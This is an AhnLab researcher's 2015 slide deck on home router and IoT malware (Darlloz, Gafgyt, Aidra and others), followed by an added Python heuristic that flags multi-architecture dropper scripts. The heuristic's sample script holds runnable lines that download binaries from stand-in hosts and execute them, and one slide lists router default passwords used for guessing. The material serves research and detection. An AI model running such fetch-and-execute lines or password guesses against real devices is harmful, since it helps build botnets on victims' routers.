
Embedded Linux malware trends 20150323 v1.0 (public edition)


Embedded Linux malware trends centred on home routers, with a brief look at IoT as it relates to embedded Linux.

Home Router malware



  1. IoT malware (centred on home routers), 2015.03.20 (V1.0), public edition. CHA Minseok (車珉錫, 차민석, Jacky Cha, mstoned7), Senior Researcher, AhnLab Security Emergency response Center (ASEC) Analysis Team. In fact: embedded Linux malware centred on home network devices.
  2. © AhnLab, Inc. All rights reserved. :~$ apropos • IoT • Embedded Linux • Home Network • Major embedded Linux malware • Case study
  3. :~$ whoami Profile − CHA Minseok (車珉錫, 차민석, Jacky Cha, mstoned7) − 7 January 1988: started computing on an Apple ][+ clone − 1989: infected by a Brain virus variant − 1997: joined AhnLab − Senior Antivirus Researcher at AhnLab − Malware analysis and research in the Security Emergency response Center (ASEC) Analysis Team − Member of the public-private joint investigation team and the cyber-security expert group − Member of AVED, AMTSO and vforum − Wildlist Reporter
  4. Contents: 01 IoT and Embedded Linux • 02 Home Network • 03 Incidents • 04 Major malware • 05 Case study • 06 Countermeasures and their limits • 07 Closing remarks and outlook
  5. 01 IoT and Embedded Linux
  6. IoT (Internet of Things) • IoT - Intelligent technologies and services through which people and things, and things and other things, exchange information * Source: http://en.wikipedia.org/wiki/Internet_of_Things
  7. IoT (Internet of Things) • Application areas * Source: http://www.kpcb.com/blog/how-kleiner-perkins-invests-in-the-internet-of-things-picking-the-winners
  8. IoT (Internet of Things) • Security threats: privacy violation (spying); information leakage (leakage of personal data); data tampering (tampering with internal and communications data, a serious problem for medical devices); malware infection (DDoS attacks, Bitcoin mining, etc.)
  9. IoT (Internet of Things) • OS: Embedded Linux, iOS, Windows, Contiki, RIOT, mbed, Tizen
  10. IoT (Internet of Things) • Windows 10 supports the Raspberry Pi 2 * Source: http://www.raspberrypi.org/raspberry-pi-2-on-sale
  11. Embedded Linux • Embedded Linux * Source: http://en.wikipedia.org/wiki/Linux_on_embedded_systems
  12. 02 Home Network
  13. Home Network • Home Router - Home router (Korean: 인터넷 공유기), Wi-Fi router, wireless router * Source: http://en.wikipedia.org/wiki/Wireless_router
  14. Home Network • SoC (System on a chip) * Source: http://en.wikipedia.org/wiki/System_on_a_chip
  15. Home Network / Home Router • Product specifications - MIPS - Embedded Linux * Source: http://www.iptime.co.kr & http://www.netcheif.com/Reviews/BR-6478AC/PDF/8197D.pdf
  16. Home Network / Embedded Linux • BusyBox - Bundles the main Linux commands into a single executable * Source: http://www.busybox.net/
  17. Home Network / Embedded Linux • Login - Factory-default login/password
  18. Home Network / Embedded Linux • BusyBox
  19. Home Network / Home Router • cpuinfo
  20. Home Network / Embedded Linux • Shellshock test - Fortunately, not vulnerable
  21. 03 Incidents
  22. IoT in TV drama • Murder by hacking - A terminal cancer patient attempts murder by hacking a car, a POS terminal and an elevator * Source: CSI: New York, Season 6, Episode 2 (2009)
  23. Configuration changes • Changing the home router's DNS address - A security flaw in the home router is used to change its DNS address, so that visits to well-known sites are redirected to fake websites
  24. Configuration changes • Changing the home router's DNS address - Attempts to infect users with malware by exploiting a home router flaw * Source: http://www.krcert.or.kr/kor/data/secNoticeView.jsp?p_bulletin_writing_sequence=20950
  25. Configuration changes • Home router manufacturer - Recommends a firmware update * Source: http://www.iptime.co.kr/~iptime/bbs/view.php?id=notice&page=2&ffid=&fsid=&dffid=&dfsid=&dftid=&sn1=&divpage=1&dis_comp=&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&dis_comp=&ng_value=&x_value=&no=812
  26. Configuration changes • Sality - The Sality virus installs Rbrute, which changes the router's primary DNS * Source: http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute29
  27. Data tampering • Attack on a Synology NAS vulnerability - Ransomware appeared that exploits a vulnerability in DSM 4.3-3810 or earlier, encrypts the files stored on the device and demands payment * Source: http://www.synology.com/en-us/company/news/article/470
  28. Backdoor • Backdoor in Netis routers - Uses UDP port 53413 * Source: http://www.netiskorea.com/atboard_view.php?grp1=news&grp2=notice&uid=9034
  29. Backdoor • Backdoor in Netis routers - Netis Korea announced that the backdoor is not present in products sold in Korea * Source: http://www.netiskorea.com/atboard_view.php?grp1=news&grp2=notice&uid=9034
  30. DDoS • Internet outage - On the morning of 29 November 2014 the DNS servers of SK Broadband and LG U+ were attacked * Source: http://www.zdnet.co.kr/news/news_view.asp?artice_id=20141129202907&type=xml
  31. DDoS • DDoS attacks using home routers - Lizard Squad's Christmas 2014 attacks on Microsoft's Xbox Live and Sony's PlayStation Network * Source: http://krebsonsecurity.com/2015/01/lizard-stresser-runs-on-hacked-home-routers/
  32. 04 Major malware
  33. Timeline (2008 to 2015, in the order the following slides cover them): Hydra, Psybot, Uteltend (Knb, Chuck Norris), Uteltend (Knb, Chuck Norris 2), Aidra, Darlloz, Themoon, Gafgyt (Fgt), Moose, Baswool
  34. Hydra • Hydra - IRC bot made public in April 2011 - Present on underground forums since 2008 - Exploits a D-Link device vulnerability * Source: http://baume.id.au/psyb0t/PSYB0T.pdf
  35. Psybot • Psybot - Discovered by Terry Baume in January 2009 * Source: http://baume.id.au/psyb0t/PSYB0T.pdf
  36. Psybot • Psybot - The first seen in the wild; used for DDoS attacks * Source: http://www.dronebl.org/blog/8
  37. Psybot • Psybot - MIPS Linux malware - Packed with UPX
  38. Uteltend (Chuck Norris, Knb) • Chuck Norris Botnet - Discovered at the end of 2009 at Masaryk University in the Czech Republic - MIPS Linux IRC bot - Telnet brute-force attack * Source: http://www.muni.cz/research/projects/4622/web/chuck_norris._botnet
  39. Uteltend (Chuck Norris, Knb) • Chuck Norris Botnet - The source code contains the Italian string '[R]anger Killato: in nome di Chuck Norris!' - Unpacking knb-mips with UPX reveals the string 'Knb Keepnick bot 0.2.2'
  40. Uteltend (Chuck Norris, Knb) • File composition - Configuration file - IRC bot + DDoS attack tool - password
  41. Uteltend (Chuck Norris, Knb) • File composition - Includes the Kaiten (Tsunami) DDoS attack tool
  42. Aidra (Lightaidra) • Malicious IRC bot - Discovered in February 2012; infections also reported in Korea - DDoS attacks * Source: http://www.fitsec.com/blog/index.php/2012/02/19/new-piece-of-malicious-code-infecting-routers-and-iptvs/
  43. Aidra (Lightaidra) • getbinaries.sh script with binaries for ARM, MIPS, MIPSEL, PowerPC and SuperH
  44. Aidra (Lightaidra) • Aidra vs Darlloz - Adds a function that removes its rival Darlloz * Source: http://now.avg.com/war-of-the-worms/
  45. Darlloz (Zollard) • Darlloz - Internet of Things worm discovered in October 2013 - Infects x86, MIPS, ARM and PowerPC - Cryptocurrency mining added * Source: http://www.symantec.com/connect/blogs/iot-worm-used-mine-cryptocurrency
  46. Darlloz (Zollard) • Infections - An estimated 31,000 systems infected worldwide - Systems in Korea account for 17% of all infections * Source: http://www.symantec.com/connect/blogs/iot-worm-used-mine-cryptocurrency
  47. Darlloz (Zollard) • Script with binaries for armeabi, arm, PowerPC, MIPS, mipsel and x86
  48. Darlloz (Zollard) • Darlloz - Exploits the PHP php-cgi Information Disclosure Vulnerability (CVE-2012-1823) - Password guessing against routers and set-top boxes: dreambox, vizxv, stemroot, sysadmin, superuser, 1234, 12345, 1111, smcadmin
  49. Darlloz (Zollard) • Darlloz - Downloads and installs a cpuminer build matching the system and mines cryptocurrencies such as Mincoins, Dogecoins and Bitcoins
  50. Themoon • Themoon - Discovered on 13 February 2014 - Infects Linksys home routers through a vulnerability * Source: https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
  51. Themoon • Themoon - Strings
  52. Themoon • Themoon - Embedded PNG image
  53. Gafgyt (Bashlite.SMB, Fgt) • Gafgyt (Bashlite.SMB, Fgt) - Described by Trend Micro as Bashlite, which abuses BusyBox * Source: http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/
  54. Gafgyt (Bashlite.SMB, Fgt) • Gafgyt (Bashlite.SMB, Fgt) - Information published by Dr.Web * Source: https://news.drweb.com/show/?i=7092&lng=en
  55. Gafgyt (Bashlite.SMB, Fgt) • Gafgyt (Bashlite.SMB, Fgt) - Has existed since at least August 2014 - Used in the DDoS attack on Microsoft on 24 November 2014 - Used in Lizard Stresser, which DDoSed gaming sites at the end of 2014 - Source code released in January 2015 - Many variants are being built from the released source code
  56. Gafgyt (Bashlite.SMB, Fgt) • Functions * Source: http://vms.drweb.com/virus/?i=4242198
  57. Gafgyt (Bashlite.SMB, Fgt) • bin.sh * Source: http://vms.drweb.com/virus/?i=4242198
  58. Moose • Moose - Bitcoin miner active since at least October 2014 - ARM and MIPS versions exist - Also found on home routers in Korea
  59. Baswool • Baswool - Confirmed found in Korea in November 2014 - Similar to Bashwoop (Powbot)
  60. Baswool • Variant - First submitted to VirusTotal on 9 December 2014 - Key strings are encrypted * md5: 331596b415ce2228e596cda400d8bfd2
  61. 05 Case study
  62. 06 Countermeasures and their limits
  63. Current problems. No antivirus: • No security software of any kind, antivirus included • The nature of the devices makes it hard to distribute antivirus or dedicated removal tools • Today the user has to install it themselves. Malware removal: • Has to be removed by hand • Removal means visiting homes, one by one! Firmware update: • The user has to update it themselves • How many people actually update their firmware?!
  64. Government measures • The Ministry of Science, ICT and Future Planning (미래부) announced stronger home router security - June 2015: build a real-time monitoring system for home routers - July 2015: establish and operate a router security update system * Source: http://www.ddaily.co.kr/news/article.html?no=127945
  65. Government measures • Reactions * Source: http://www.clien.net/cs2/bbs/board.php?bo_table=news&wr_id=1953579
  66. Government measures • Reactions * Source: http://cafe.naver.com/malzero
  67. Government measures • Reactions * Source: http://www.iptime.co.kr/~iptime/bbs/view.php?id=notice&page=1&ffid=&fsid=&dffid=&dfsid=&dftid=&sn1=&divpage=1&dis_comp=&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&dis_comp=&ng_value=&x_value=&no=915
  68. Current problems • From the analyst's side - Little experience with embedded Linux - Little experience with ARM/MIPS processors - Little experience with hardware debugging - Analysis capability needed for countless IoT devices?!
  69. 07 Closing remarks and outlook
  70. Wrap up • Much home router malware already exists - Attacks began in 2009, but we knew far too little... • Study! - ARM, MIPS - Embedded Linux - Hardware debugging, etc.
  71. MIPS • What the hell?! - Unfamiliar instructions - A different syscall convention - Not yet supported by the Hex-Rays decompiler
  72. Vulnerabilities • Smart home analysis - 50 devices analysed, including thermostats, smart locks, smart bulbs, smart smoke detectors, smart energy management devices and smart hubs * Source: http://www.symantec.com/connect/blogs/iot-smart-home-giving-away-keys-your-kingdom
  73. Vulnerabilities • Vulnerabilities keep being found * Source: https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2
  74. Vulnerabilities • Vulnerabilities keep being found * Source: https://beyondbinary.io/advisory/seagate-nas-rce
  75. Today's security problem • Not really a fair fight * Source: http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
  76. Today's security problem • Security is something everyone has to do together * Source: http://www.security-marathon.be/?p=1786
  77. Q&A • email: minseok.cha@ahnlab.com / mstoned7@gmail.com • http://xcoolcat7.tistory.com • https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
  78. Reference • Marta Janus / Kaspersky, 'Heads of the Hydra. Malware for Network Devices', 2011 (http://securelist.com/analysis/36396/heads-of-the-hydra-malware-for-network-devices/?replyto=15081&tree=0) • Marta Janus / Kaspersky, 'State of play: network devices facing bulls-eye', 2014 (http://securelist.com/blog/research/67794/state-of-play-network-devices-facing-bulls-eye) • 손기종, 'IoT device security threats seen through home router attack cases', 2015 • 장영준 / Samsung (personal communication) • 류소준 (Ryu Sojun) / KISA (personal communication) • 신동은 (Shin Dongeun) / KISA (personal communication) • 조인중 (Cho Injoong) / SK Broadband (personal communication)
  79. DESIGN YOUR SECURITY
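The dropper scripts shown on slides 43 (Aidra's getbinaries.sh) and 47 (Darlloz) share one shape: fetch a binary for every CPU architecture the botnet supports, mark it executable, run it, and let the wrong ones fail. As an added example that is not part of the original deck, the Python heuristic below flags shell scripts with that shape so an analyst can triage scripts pulled from a router; the regular expressions, the architecture token list and both sample scripts (with the non-routable host example.invalid and the documentation address 192.0.2.10) are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Architecture names seen in the file names fetched by Aidra's getbinaries.sh and the Darlloz
# script (slides 43 and 47). Longer tokens come first so that "mipsel" is not read as "mips".
ARCH_TOKENS = ("armeabi", "mipsel", "powerpc", "superh", "arm", "mips", "ppc", "sh4", "x86", "i686")

# A download command and what it fetches: wget/curl followed by a URL, or tftp with -r FILE.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^\n;|&]*?((?:https?|ftp)://\S+)|\btftp\b[^\n;|&]*?-r\s+(\S+)", re.I)
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")  # marks the download executable
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./\S+", re.MULTILINE)  # runs a file from the current directory


@dataclass
class Verdict:
    archs: set        # distinct CPU architectures among the fetched file names
    fetch_count: int  # number of download commands found
    chmod: bool       # the script marks something executable
    execs: int        # number of ./something invocations

    def is_dropper(self) -> bool:
        # One router has one CPU: fetching binaries for three or more architectures,
        # marking them executable and running them is the dropper signature.
        return len(self.archs) >= 3 and self.chmod and self.execs >= 1


def arch_of(filename: str):
    low = filename.lower()
    return next((tok for tok in ARCH_TOKENS if tok in low), None)


def analyze(script: str) -> Verdict:
    archs, fetches = set(), 0
    for m in FETCH_RE.finditer(script):
        fetches += 1
        tok = arch_of((m.group(1) or m.group(2)).rsplit("/", 1)[-1])
        if tok:
            archs.add(tok)
    return Verdict(archs, fetches, bool(CHMOD_RE.search(script)), len(EXEC_RE.findall(script)))


# Constructed sample in the shape of getbinaries.sh; example.invalid and 192.0.2.10 are not real hosts.
SAMPLE_DROPPER = """#!/bin/sh
busybox wget http://example.invalid/bins/arm -O arm; chmod +x arm; ./arm
busybox wget http://example.invalid/bins/mips -O mips; chmod +x mips; ./mips
busybox wget http://example.invalid/bins/mipsel -O mipsel; chmod +x mipsel; ./mipsel
tftp -g -r ppc 192.0.2.10; chmod 777 ppc; ./ppc
"""

# Constructed benign helper: one download for the box's own architecture, nothing run from ./
SAMPLE_BENIGN = """#!/bin/sh
wget http://example.invalid/fw/update-mips.bin -O /tmp/update.bin
chmod +x /tmp/flash.sh
/tmp/flash.sh /tmp/update.bin
"""
```

`analyze(SAMPLE_DROPPER).is_dropper()` is True (four architectures fetched, chmod, four executions) while the single-architecture firmware helper is not flagged, which is the distinction the slides' multi-binary lists make visible.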
